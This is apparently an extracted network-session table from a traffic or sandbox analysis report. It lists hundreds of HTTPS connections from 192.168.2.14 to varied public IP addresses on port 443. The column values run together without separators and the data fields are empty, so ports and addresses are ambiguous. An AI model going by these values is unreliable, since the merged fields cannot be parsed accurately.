                                      11666192.168.2.1439952203.23.14.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11667192.168.2.145080660.67.163.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11668192.168.2.144256086.197.117.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11669192.168.2.144762641.12.250.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11670192.168.2.144327895.66.146.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11671192.168.2.1459140115.248.187.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11672192.168.2.144449264.92.55.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11673192.168.2.145077031.242.72.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11674192.168.2.1459776107.94.125.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11675192.168.2.1457790210.30.136.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11676192.168.2.14529589.211.112.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11677192.168.2.145623824.76.195.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11678192.168.2.1459432175.61.195.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11679192.168.2.1441156123.80.132.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11680192.168.2.1447312189.121.102.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11681192.168.2.1457694166.237.251.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11682192.168.2.1460000223.77.59.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11683192.168.2.144708087.198.188.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11684192.168.2.145528670.192.166.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11685192.168.2.145119494.77.158.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11686192.168.2.1447972216.192.33.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11687192.168.2.1444852212.29.216.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11688192.168.2.14520049.223.122.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11689192.168.2.1440460174.174.220.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11690192.168.2.1449286137.255.35.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11691192.168.2.1457866207.153.21.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11692192.168.2.1446974140.221.137.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11693192.168.2.14473669.167.189.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11694192.168.2.1446618171.134.133.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11695192.168.2.1435110119.83.249.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11696192.168.2.1437396216.42.121.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11697192.168.2.144750852.104.33.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11698192.168.2.143959261.127.90.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11699192.168.2.1440868107.107.143.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11700192.168.2.1438390162.52.12.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11701192.168.2.14361224.248.56.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11702192.168.2.14548108.105.170.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11703192.168.2.144467646.204.245.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11704192.168.2.143960427.151.165.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11705192.168.2.1442314195.30.86.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11706192.168.2.1433100137.61.172.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11707192.168.2.1435012173.62.48.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11708192.168.2.144439839.58.207.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11709192.168.2.1446840194.38.227.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11710192.168.2.144691613.102.233.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11711192.168.2.1447790128.116.204.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11712192.168.2.143870881.208.80.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11713192.168.2.1436102219.107.152.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11714192.168.2.1456006202.41.53.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11715192.168.2.143576627.246.101.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11716192.168.2.144196259.167.98.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11717192.168.2.1457180137.216.107.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11718192.168.2.144962461.121.141.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11719192.168.2.143692214.205.246.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11720192.168.2.1443546216.252.177.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11721192.168.2.1457732171.32.66.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11722192.168.2.1435254137.140.48.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11723192.168.2.144059667.85.161.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11724192.168.2.1452930145.113.251.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11725192.168.2.1450664205.202.36.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11726192.168.2.1459916116.13.200.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11727192.168.2.1460310112.61.21.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11728192.168.2.143840636.5.4.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11729192.168.2.143993474.158.178.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11730192.168.2.1449150209.119.37.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11731192.168.2.143962261.142.35.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11732192.168.2.143989637.17.99.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11733192.168.2.144885018.246.106.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11734192.168.2.144357893.191.76.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11735192.168.2.145501472.173.107.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11736192.168.2.1447576185.176.197.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11737192.168.2.145716886.188.81.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11738192.168.2.1452760212.185.10.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11739192.168.2.1444820205.200.228.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11740192.168.2.1453954173.39.249.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11741192.168.2.144660688.243.134.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11742192.168.2.1449936151.15.147.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11743192.168.2.1458042131.85.48.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11744192.168.2.145146043.171.94.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11745192.168.2.143855461.56.20.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11746192.168.2.1440222183.98.131.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11747192.168.2.1458746189.214.253.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11748192.168.2.1437738122.51.144.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11749192.168.2.145676482.99.180.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11750192.168.2.144303812.137.170.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11751192.168.2.1443590120.137.8.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11752192.168.2.1447796151.0.163.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11753192.168.2.145630437.93.173.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11754192.168.2.145370289.33.253.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11755192.168.2.145905435.43.84.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11756192.168.2.145651080.91.228.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11757192.168.2.145404290.40.218.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11758192.168.2.144253478.130.184.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11759192.168.2.1438514206.67.77.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11760192.168.2.143818282.237.33.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11761192.168.2.14495041.170.35.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11762192.168.2.143282682.248.44.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11763192.168.2.1446654142.134.124.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11764192.168.2.1435872103.64.80.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11765192.168.2.1450340139.201.243.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11766192.168.2.144464017.249.91.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11767192.168.2.1449914196.6.157.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11768192.168.2.144232239.205.6.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11769192.168.2.14498621.229.203.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11770192.168.2.1452580116.161.186.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11771192.168.2.1435132112.117.207.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11772192.168.2.144321089.152.165.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11773192.168.2.144131075.184.114.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11774192.168.2.143445635.221.216.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11775192.168.2.1443634201.209.63.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11776192.168.2.144358642.105.66.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11777192.168.2.145005634.220.28.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11778192.168.2.1447378193.179.194.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11779192.168.2.1443020128.195.243.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11780192.168.2.145800294.221.181.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11781192.168.2.1451498129.191.201.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11782192.168.2.144444042.100.35.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11783192.168.2.1458044149.32.124.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11784192.168.2.1448416135.195.47.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11785192.168.2.144949412.243.71.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11786192.168.2.145343238.184.197.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11787192.168.2.145103038.226.245.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11788192.168.2.145217475.169.242.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11789192.168.2.144042253.187.108.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11790192.168.2.1450428190.63.92.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11791192.168.2.1455412190.208.24.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11792192.168.2.1444226221.232.33.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11793192.168.2.1449610113.150.210.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11794192.168.2.1448084223.68.82.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11795192.168.2.1437376102.143.219.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11796192.168.2.144762070.196.180.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11797192.168.2.144413653.21.45.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11798192.168.2.143576444.29.236.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11799192.168.2.144383662.189.210.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11800192.168.2.1439890114.141.213.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11801192.168.2.145087417.252.179.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11802192.168.2.1450162136.106.158.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11803192.168.2.1452620115.200.233.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11804192.168.2.145087849.120.135.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11805192.168.2.1440646161.42.9.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11806192.168.2.146002043.65.120.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11807192.168.2.1444076124.158.57.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11808192.168.2.143998649.34.19.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11809192.168.2.1434760182.224.189.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11810192.168.2.1442424189.51.202.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11811192.168.2.1437934101.147.99.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11812192.168.2.143751873.200.22.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11813192.168.2.1443876159.233.20.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11814192.168.2.1455718211.198.135.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11815192.168.2.1439992210.157.57.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11816192.168.2.14511501.248.38.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11817192.168.2.143714097.237.41.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11818192.168.2.144835889.107.137.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11819192.168.2.1449700149.13.131.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11820192.168.2.1433898145.213.126.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11821192.168.2.1444244184.91.222.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11822192.168.2.1457996190.226.20.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11823192.168.2.1441230153.131.195.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11824192.168.2.143636070.183.176.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11825192.168.2.1438762174.72.220.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11826192.168.2.1446622148.58.110.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11827192.168.2.1457898109.81.39.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11828192.168.2.144166488.102.139.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11829192.168.2.1456956187.10.199.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11830192.168.2.1459728121.96.89.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11831192.168.2.1443330162.165.36.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11832192.168.2.145837235.183.120.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11833192.168.2.144840048.141.202.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11834192.168.2.144629073.2.237.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11835192.168.2.144843883.168.52.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11836192.168.2.144645874.140.17.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11837192.168.2.145275888.71.168.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11838192.168.2.145169868.216.157.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11839192.168.2.145234074.152.243.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11840192.168.2.145098292.107.97.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11841192.168.2.1439344186.178.113.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11842192.168.2.1444380181.21.55.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11843192.168.2.1447410105.187.213.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11844192.168.2.1454556130.247.41.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11845192.168.2.1443972123.213.36.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11846192.168.2.1448424120.78.124.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11847192.168.2.1444614150.5.111.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11848192.168.2.145582462.180.62.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11849192.168.2.145163665.58.108.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11850192.168.2.1440014122.113.170.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11851192.168.2.145448266.163.204.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11852192.168.2.144938868.185.36.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11853192.168.2.1455688115.214.83.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11854192.168.2.1446594145.33.17.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11855192.168.2.145423025.251.78.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11856192.168.2.144014660.46.79.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11857192.168.2.143655047.72.63.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11858192.168.2.1439734216.166.90.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11859192.168.2.1448364112.82.210.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11860192.168.2.1439816186.225.187.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11861192.168.2.14398825.106.129.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11862192.168.2.144226843.255.160.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11863192.168.2.1444584118.144.94.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11864192.168.2.145230285.149.156.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11865192.168.2.1444372166.198.214.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11866192.168.2.143697020.219.150.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11867192.168.2.145079063.33.54.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11868192.168.2.1456718211.243.128.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11869192.168.2.144005273.214.80.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11870192.168.2.1436692159.140.135.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11871192.168.2.145991041.60.15.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11872192.168.2.144721032.205.159.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11873192.168.2.1456882162.36.222.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11874192.168.2.143575417.84.222.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11875192.168.2.143826070.240.136.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11876192.168.2.143575680.123.32.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11877192.168.2.1447370200.86.37.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11878192.168.2.143837060.61.153.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11879192.168.2.145112814.239.169.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11880192.168.2.145283491.221.107.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11881192.168.2.1433270186.212.135.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11882192.168.2.143912274.212.211.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11883192.168.2.1451288160.15.164.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11884192.168.2.145048467.239.194.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11885192.168.2.144594452.159.162.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11886192.168.2.145011632.60.97.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11887192.168.2.1445464134.227.106.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
